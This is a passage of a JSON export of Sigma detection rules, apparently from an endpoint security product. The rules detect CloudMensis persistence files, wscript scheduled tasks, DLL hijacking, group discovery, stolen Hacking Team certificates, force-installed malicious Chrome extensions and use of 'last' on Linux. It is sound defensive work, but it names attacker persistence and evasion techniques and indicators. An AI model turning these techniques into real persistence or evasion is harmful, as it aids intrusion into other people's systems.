"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5c40b82-e29e-4791-a063-9fb90ce0d69d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617765Z",
"creation_date": "2026-03-23T11:45:34.617766Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617771Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://attack.mitre.org/versions/v11/techniques/T1543/004/"
],
"name": "cloudmensis_malware.yml",
"content": "title: Suspicious Command-Line related to CloudMensis\nid: a5c40b82-e29e-4791-a063-9fb90ce0d69d\ndescription: |\n Detects suspicious command line arguments associated with CloudMensis malware.\n CloudMensis is a macOS malware that leverages cloud storage as its command and control (C2) channel, exfiltrating sensitive information such as documents, keystrokes, and screen captures from compromised systems.\n It is recommended to inspect the content of the plist file and the process launching the suspicious command.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://attack.mitre.org/versions/v11/techniques/T1543/004/\ndate: 2023/07/11\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Malware.CloudMensis\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n CommandLine|contains:\n # CloudMensis preferences\n - '/Library/Preferences/com.apple.iTunesInfo28.plist'\n - '/Library/Preferences/com.apple.iTunesInfo29.plist'\n # /Users//Library/Preferences/com.apple.iTunesInfo.plist\n - '/Library/Preferences/com.apple.iTunesInfo.plist'\n # /Users//Library/LaunchAgents/.com.apple.loginwindow.plist\n - '/Library/LaunchAgents/.com.apple.loginwindow.plist'\n # /Users//Library/LaunchAgents/.com.apple.softwareupdate.plist\n - '/Library/LaunchAgents/.com.apple.softwareupdate.plist'\n # CloudMensis hidden daemon\n - '/Library/LaunchDaemons/.com.apple.WindowServer.plist'\n\n # CloudMensis binaries path\n - '/Library/Containers/com.apple.FaceTime/Data/Library/windowserver'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5c40b82-e29e-4791-a063-9fb90ce0d69d",
"rule_name": "Suspicious Command-Line related to CloudMensis",
"rule_description": "Detects suspicious command line arguments associated with CloudMensis malware.\nCloudMensis is a macOS malware that leverages cloud storage as its command and control (C2) channel, exfiltrating sensitive information such as documents, keystrokes, and screen captures from compromised systems.\nIt is recommended to inspect the content of the plist file and the process launching the suspicious command.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2025-03-31",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a618be30-2183-4bab-b5f6-42f4657a8a45",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084495Z",
"creation_date": "2026-03-23T11:45:34.084497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_script_scheduled_task.yml",
"content": "title: Suspicious Wscript Scheduled Task Created\nid: a618be30-2183-4bab-b5f6-42f4657a8a45\ndescription: |\n Detects the creation of scheduled tasks that execute scripts through wscript.exe via command-line.\n This technique is frequently abused by attackers to maintain persistence by scheduling malicious script execution at regular intervals or system events.\n While scheduled tasks are common, those invoking wscript directly warrant investigation.\n It is recommended to investigate scheduled tasks executing wscript.exe, analyze the associated script contents for malicious code, and remove unauthorized tasks while reviewing historical execution patterns.\nreferences:\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/05/13\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.Wscript\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_action:\n CommandLine|contains:\n - '/create '\n - '-create '\n selection_name:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n selection_scripting_engine:\n CommandLine|contains:\n - 'cscript '\n - 'cscript.exe '\n - 'wscript '\n - 'wscript.exe '\n\n exclusion_vda_cloning_orchestrator:\n CommandLine|contains: 'VDA Cloning Orchestrator'\n\n exclusion_ojdkbuild:\n CommandLine|contains|all:\n - 'ojdkbuild_jdk_update_checker'\n - '?:\\Program Files\\ojdkbuild\\java-*\\update\\checker.vbs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a618be30-2183-4bab-b5f6-42f4657a8a45",
"rule_name": "Suspicious Wscript Scheduled Task Created",
"rule_description": "Detects the creation of scheduled tasks that execute scripts through wscript.exe via command-line.\nThis technique is frequently abused by attackers to maintain persistence by scheduling malicious script execution at regular intervals or system events.\nWhile scheduled tasks are common, those invoking wscript directly warrant investigation.\nIt is recommended to investigate scheduled tasks executing wscript.exe, analyze the associated script contents for malicious code, and remove unauthorized tasks while reviewing historical execution patterns.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a634e7a2-5d0a-4686-a230-17b8fb969926",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080925Z",
"creation_date": "2026-03-23T11:45:34.080927Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080932Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/WhichbufferArda/status/1566395376252379137",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rastls.yml",
"content": "title: DLL Hijacking via RawTls.exe\nid: a634e7a2-5d0a-4686-a230-17b8fb969926\ndescription: |\n Detects potential Windows DLL Hijacking via RawTls.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Symantec executable and placing a malicious RawTls.dll file alongside.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/WhichbufferArda/status/1566395376252379137\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dot1xtra.exe'\n ProcessSignature: 'Symantec Corporation'\n ImageLoaded|endswith: '\\RasTls.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Symantec\\\\*\\bin\\'\n - '?:\\Program Files (x86)\\Symantec\\\\*\\bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a634e7a2-5d0a-4686-a230-17b8fb969926",
"rule_name": "DLL Hijacking via RawTls.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RawTls.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Symantec executable and placing a malicious RawTls.dll file alongside.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a69afc09-359a-4fbc-ae4c-77637f5258fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628212Z",
"creation_date": "2026-03-23T11:45:34.628214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628219Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/",
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_001_net_localgroup.yml",
"content": "title: Group Content Discovered\nid: a69afc09-359a-4fbc-ae4c-77637f5258fc\ndescription: |\n Detects the execution of 'net localgroup ' or 'net group '.\n This is often used by attackers to discover the content of the groups locally or in the domain.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2022/12/01\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains:\n - ' localgroup'\n - ' group'\n\n # This is handled by the rules\n filter_command:\n CommandLine|contains:\n - '/add'\n - '/delete'\n - '/del'\n filter_admin:\n CommandLine|contains: 'admin'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a69afc09-359a-4fbc-ae4c-77637f5258fc",
"rule_name": "Group Content Discovered",
"rule_description": "Detects the execution of 'net localgroup ' or 'net group '.\nThis is often used by attackers to discover the content of the groups locally or in the domain.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6b56b83-9dfb-45a3-ad2d-9f468b0f6386",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070428Z",
"creation_date": "2026-03-23T11:45:34.070430Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_hacking_team_stolen_cert_image_load.yml",
"content": "title: Image Loaded Signed with Hacking Team Certificate\nid: a6b56b83-9dfb-45a3-ad2d-9f468b0f6386\ndescription: |\n Detects the loading of an image signed with Hacking Team's certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the binary to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/01/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ImageSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6b56b83-9dfb-45a3-ad2d-9f468b0f6386",
"rule_name": "Image Loaded Signed with Hacking Team Certificate",
"rule_description": "Detects the loading of an image signed with Hacking Team's certificates.\nHackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the binary to search for malicious contents.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-01-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6cace98-683f-4957-8835-f651ff11941e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089434Z",
"creation_date": "2026-03-23T11:45:34.089436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/",
"https://www.connectwise.com/blog/threat-report/smash-jacker",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_malicious_chrome_extensions_forceinstall.yml",
"content": "title: Malicious Chrome-based Browser Extension Force-installed\nid: a6cace98-683f-4957-8835-f651ff11941e\ndescription: |\n Detects a modification of the registry key used to force the installation of a known malicious extension in Chrome or Edge.\n Adversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\n It is recommended to check if the process modifying the registry key has legitimate reason to do it and if there is a legitimate reason to install this application.\nreferences:\n - https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/\n - https://www.connectwise.com/blog/threat-report/smash-jacker\n - https://attack.mitre.org/techniques/T1176/\ndate: 2025/01/31\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist'\n - 'Software\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist'\n Details: 'macjkjgieeoakdlmmfefgmldohgddpkj' # https://www.connectwise.com/blog/threat-report/smash-jacker\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6cace98-683f-4957-8835-f651ff11941e",
"rule_name": "Malicious Chrome-based Browser Extension Force-installed",
"rule_description": "Detects a modification of the registry key used to force the installation of a known malicious extension in Chrome or Edge.\nAdversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\nIt is recommended to check if the process modifying the registry key has legitimate reason to do it and if there is a legitimate reason to install this application.\n",
"rule_creation_date": "2025-01-31",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6ccbaf8-6950-4be8-ae16-ec21229b758f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095003Z",
"creation_date": "2026-03-23T11:45:34.095005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095009Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/last.1.html",
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1069/001/"
],
"name": "t1033_last_linux.yml",
"content": "title: Last Logged-in Users Discovered via Last (Linux)\nid: a6ccbaf8-6950-4be8-ae16-ec21229b758f\ndescription: |\n Detects the execution of last, a tool used to gather the last session of users.\n Adversaries may use it during the discovery phase of an attack to discover new users and their activity.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man1/last.1.html\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1069/001/\ndate: 2023/12/15\nmodified: 2025/10/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - attack.t1069.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/last'\n CommandLine:\n - 'last'\n - 'lastb'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n # Exclude manual last launched from a terminal emulator\n exclusion_terminal_emulators:\n GrandparentCommandLine|endswith:\n - '/gnome-terminal-server'\n - '/terminator'\n - '/xfce4-terminal'\n - '/xterm'\n\n exclusion_fusioninventory:\n - ParentCommandLine|contains: 'fusioninventory-agent'\n - GrandparentCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_ossec_logcollector:\n - ParentImage: '/var/ossec/bin/ossec-logcollector'\n - GrandparentImage: '/var/ossec/bin/ossec-logcollector'\n\n exclusion_wazuh:\n - ParentImage: '/var/ossec/bin/wazuh-logcollector'\n - GrandparentImage|endswith: '/ossec/bin/wazuh-logcollector'\n\n exclusion_zabbix:\n GrandparentImage:\n - '/usr/sbin/zabbix_agentd'\n - '/usr/sbin/zabbix_agent2'\n\n exclusion_mtxagent:\n ParentImage|endswith: '/bmc-software/client-management/client/bin/mtxagent'\n\n exclusion_ocsinventory:\n - ParentCommandLine|startswith:\n - '/usr/bin/perl */usr/bin/ocsinventory-agent'\n - '/usr/bin/perl */usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl */usr/local/bin/ocsinventory-agent'\n - GrandparentCommandLine|startswith:\n - '/usr/bin/perl */usr/bin/ocsinventory-agent'\n - '/usr/bin/perl */usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl */usr/local/bin/ocsinventory-agent'\n - '/bin/bash /etc/cron.*/ocsinventory-agent'\n\n exclusion_prodigeadmin:\n GrandparentCommandLine|startswith: '/bin/bash /prodige/admin/prodigeadmin/.pgih-bootstrap/'\n\n exclusion_glpi_agent:\n - ParentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n - 'glpi-agent: running *'\n - 'glpi-agent: task *'\n - GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent*'\n - 'glpi-agent: running *'\n - 'glpi-agent: task *'\n\n exclusion_tanium:\n - ParentCommandLine|startswith:\n - '/bin/sh /opt/tanium/taniumclient/'\n - '/bin/bash /opt/Tanium/TaniumClient/'\n - ProcessAncestors|contains: '|/opt/Tanium/TaniumClient/TaniumClient'\n\n exclusion_atempo:\n ProcessGrandparentImage: '/opt/Atempo/HN/bin/HNagent'\n\n exclusion_qualys:\n - ProcessParentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessGrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessAncestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_aemagent:\n ProcessGrandparentImage: '/usr/local/share/CentraStage/AEMAgent/AEMAgent'\n\n exclusion_run-parts:\n ProcessGrandparentImage: '/usr/bin/run-parts'\n\n exclusion_nable:\n ProcessGrandparentImage: '/usr/sbin/nagent'\n ProcessGrandparentCommandLine|contains: '/usr/sbin/nagent -f */nagent/nagent.conf'\n\n exclusion_ansible:\n CurrentDirectory: '/home/ansible/'\n ProcessAncestors|contains: '|/usr/sbin/sshd|'\n\n exclusion_sed:\n ParentImage: '/usr/bin/sed'\n\n exclusion_snmpd:\n ParentImage: '/usr/sbin/snmpd'\n\n # https://ciscat-assessor.docs.cisecurity.org/\n exclusion_ciscat:\n GrandparentImage|endswith: '/bin/java'\n GrandparentCommandLine|contains: ' -jar Assessor-CLI.jar '\n\n exclusion_nessus:\n ProcessAncestors|contains:\n - '|/opt/nessus_agent/sbin/nessusd|'\n - '|/opt/nessus/sbin/nessusd|'\n\n exclusion_sosreport:\n GrandparentCommandLine|startswith:\n - '/usr/bin/python* /sbin/sosreport'\n - '/usr/bin/python* /usr/sbin/sosreport'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6ccbaf8-6950-4be8-ae16-ec21229b758f",
"rule_name": "Last Logged-in Users Discovered via Last (Linux)",
"rule_description": "Detects the execution of last, a tool used to gather the last session of users.\nAdversaries may use it during the discovery phase of an attack to discover new users and their activity.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-10-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6fc5220-9841-48e3-8d9e-6ef2f233f780",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088475Z",
"creation_date": "2026-03-23T11:45:34.088477Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
